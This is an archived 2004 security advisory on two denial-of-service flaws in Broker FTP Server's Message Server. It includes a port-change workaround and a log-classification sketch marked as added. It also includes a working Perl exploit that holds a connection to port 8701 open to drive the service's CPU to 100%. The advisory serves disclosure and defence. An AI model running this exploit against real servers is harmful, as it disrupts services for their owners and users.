Date: Tue, 17 Feb 2004 17:48:54 +0200
From: Aviram Jenik <[email protected]>
To: [email protected]
Subject: Broker FTP DoS (Message Server)

  Broker FTP DoS (Message Server)
------------------------------------------------
Article reference:
http://www.securiteam.com/windowsntfocus/5IP0B0AC1I.html
SUMMARY
Beyond Security's SecurITeam has discovered two security vulnerabilities
in the Broker FTP product. These vulnerabilities allow a remote attacker
to repeatedly crash TsFtpSrv.exe (the FTP service) and to cause it to
use a large amount of CPU time.
DETAILS
Affected version:
 * Broker FTP Server version 6.1.0.0

By connecting to the Broker FTP server's Message Server (by default
residing on port 8701) and immediately disconnecting, it is possible to
cause an exception in the TsFtpSrv.exe program. The exception doesn't
cause any harm besides showing a message that TsFtpSrv.exe has
encountered an Application Error.

By connecting and not sending anything (but keeping the connection open),
it is possible to cause TsFtpSrv.exe to utilize a large amount of CPU
time (basically, while the connection is kept open, CPU usage will be
100%).

Workaround:
It is not clear what the Message Server is used for, but modifying the
TsFtpSrv.ini's [TSMessageServer] allows an administrator to control what
port the server listens on (and change it from the default one).
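
A defensive sketch for monitoring this service, added here as an example and not part of the original advisory: it classifies finished TCP sessions to the Message Server port into the two patterns described under DETAILS. The record format, thresholds and function names are assumptions; the port is a parameter because the workaround lets an administrator move it off 8701.

```python
from collections import Counter

MESSAGE_SERVER_PORT = 8701  # default Message Server port per the advisory
DROP_MAX_SECONDS = 1.0      # assumption: "immediately disconnecting" means under 1 s
IDLE_MIN_SECONDS = 30.0     # assumption: held open this long with no real data
IDLE_MAX_BYTES = 1          # the PoC on this page sends one byte, then idles
DROP_REPEATS = 3            # assumption: connect-drops per source before alerting

# Constructed sample records: src dst_port duration_s client_bytes
SAMPLE = """\
192.0.2.10 8701 0.02 0
192.0.2.10 8701 0.01 0
192.0.2.10 8701 0.03 0
192.0.2.44 8701 100.0 1
198.51.100.7 8701 4.2 312
198.51.100.7 21 0.01 0
192.0.2.99 8701 0.05 0
"""

def classify(dst_port, duration, client_bytes, port=MESSAGE_SERVER_PORT):
    """Label one finished TCP session as 'connect-drop', 'idle-hold' or None."""
    if dst_port != port:
        return None
    if client_bytes == 0 and duration <= DROP_MAX_SECONDS:
        return "connect-drop"
    if client_bytes <= IDLE_MAX_BYTES and duration >= IDLE_MIN_SECONDS:
        return "idle-hold"
    return None

def alerts(lines, port=MESSAGE_SERVER_PORT):
    """Count suspicious sessions per (source, kind); return those worth alerting on."""
    counts = Counter()
    for line in lines:
        fields = line.split()
        if len(fields) != 4:
            continue  # skip blank or malformed records
        src, dst_port, duration, client_bytes = fields
        kind = classify(int(dst_port), float(duration), int(client_bytes), port)
        if kind:
            counts[(src, kind)] += 1
    # One idle-hold is enough (CPU stays pinned while the connection is open);
    # connect-drops alert once they repeat from the same source.
    return {k: n for k, n in counts.items()
            if k[1] == "idle-hold" or n >= DROP_REPEATS}

if __name__ == "__main__":
    for (src, kind), n in sorted(alerts(SAMPLE.splitlines()).items()):
        print(f"{src} {kind} x{n}")
```

The records could be produced from firewall or flow logs; sessions that exchange real data or target other ports are ignored.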
Exploit:
#!/usr/bin/perl -w
# TransSoft Broker FTP Server DoS (CPU usage and Exception)
#
use Socket;

if (not $ARGV[0]) {
    print qq~
        Usage: pfdos.pl <host>
    ~;
    exit;
}

$ip = $ARGV[0];
print "host: " . $ip . "\n\n";
sendexplt("A");

sub sendexplt {
    my ($pstr) = @_;
    $target = inet_aton($ip) || die("inet_aton problems");
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) ||
        die("Socket problems\n");
    if (connect(S, pack "SnA4x8", 2, 8701, $target)) {
        select(S);
        $| = 1;
        print $pstr;
        sleep 100;
        close(S);
    } else { die("Can't connect...\n"); }
}

Vendor Status:
We tried to contact the vendor over a month ago, but have not received
any response as of yet.
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]>
SecurITeam.
-- 
Beyond Security Ltd.
"Know that you're safe"
http://www.BeyondSecurity.com
http://www.SecuriTeam.com
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.